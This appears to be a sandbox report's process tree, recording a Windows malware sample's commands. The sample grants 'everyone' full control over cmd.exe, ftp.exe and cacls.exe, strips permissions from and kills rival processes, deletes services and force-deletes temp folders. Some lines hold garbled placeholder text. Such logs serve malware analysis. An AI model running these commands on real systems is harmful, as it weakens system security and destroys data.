C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTN.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTN.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTA.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTA.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATC.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATC.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATC.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATN.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATN.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATN.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATA.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGEATA.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGEATA.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\MSSQL~1\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\MSSQLSERVER\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\Administrator\AppData\Local\Temp\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\TempUpdate2.bat2⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f4⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f4⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f4⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f4⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f4⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\system32\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Sqltem64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Sqltem64.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\Diskraid.exe /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols\*" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols\*" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols\Diskraid.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols\Diskraid.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Norporati Windows AppVNice"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows SystenApp"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "dorporati windows dribe diskraid"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft SystenApp" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft SystenApp" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Windows\SystemBols" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft SystenApp" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files\Microsoft SystenApp" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\AppVNice.exe" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\WindowsSystemBols\AppVNice.exe" /t /e /c /r system3⤵
-
C:\Windows\SysWOW64\cacls.exeCacls "C:\Program Files (x86)\Microsoft SystenApp" /t /e /c /r everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cacls.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cmd.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\cmd.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\ftp.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\ftp.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\system32\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\ftp.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmd.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmd.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f2⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cacls.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im cacls.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cacls.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c cacls £« È¡Ìض¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f2⤵
-
